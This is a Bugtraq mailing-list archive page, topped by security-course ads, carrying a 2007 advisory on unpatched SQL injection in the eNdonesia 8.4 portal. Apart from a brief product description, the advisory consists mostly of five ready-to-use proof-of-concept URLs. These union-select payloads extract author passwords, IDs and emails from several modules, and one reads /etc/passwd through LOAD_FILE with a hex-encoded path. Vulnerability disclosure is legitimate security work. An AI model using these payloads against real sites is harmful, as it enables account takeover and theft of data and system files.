Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

eNdonesia 8.4 [multiple injection sql]

Subject: eNdonesia 8.4 [multiple injection sql]
Date: 22 Jun 2007 16:24:52 -0000
Application: eNdonesia 8.4
Web Site: http://www.endonesia.org/
Versions: all
Platform: linux, windows
Bug: multiple injection sql
Fix Available: no


-------------------------------------------------------

1) Introduction
2) Bug
3) proof of concept


===========
1) Introduction
===========

"eNdonesia 8.4 is a web portal application, content management system, 
news publishing systems, or whatever you want to name it. It has been 
developed to enable people build their own internet empire by providing portal 
for the public, 
just like what Yahoo has done, and Google want to do. "

======
2) Bug
======

injection sql 


=====
3)proof of concept
=====
http://site.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,pwd,3+from+authors/*

http://site.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,LOAD_FILE(0x2F6574632F706173737764),3+from+authors/*

--> get some local files with load_file ( you it's a priviliged account )

http://site.com/banners.php?op=click&bid=-9+union+select+pwd+from+authors/*

http://site.com/mod.php?mod=diskusi&op=viewdisk&did=-9+union+select+1,2,aid,pwd,5,6,email+from+authors/*

http://site.com/mod.php?mod=publisher&op=viewarticle&cid=2&artid=-9+union+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/*


regards laurent gaffié
contact : laurent.gaffie@gmail.com

<Prev in Thread] Current Thread [Next in Thread>
  • eNdonesia 8.4 [multiple injection sql], laurent . gaffie <=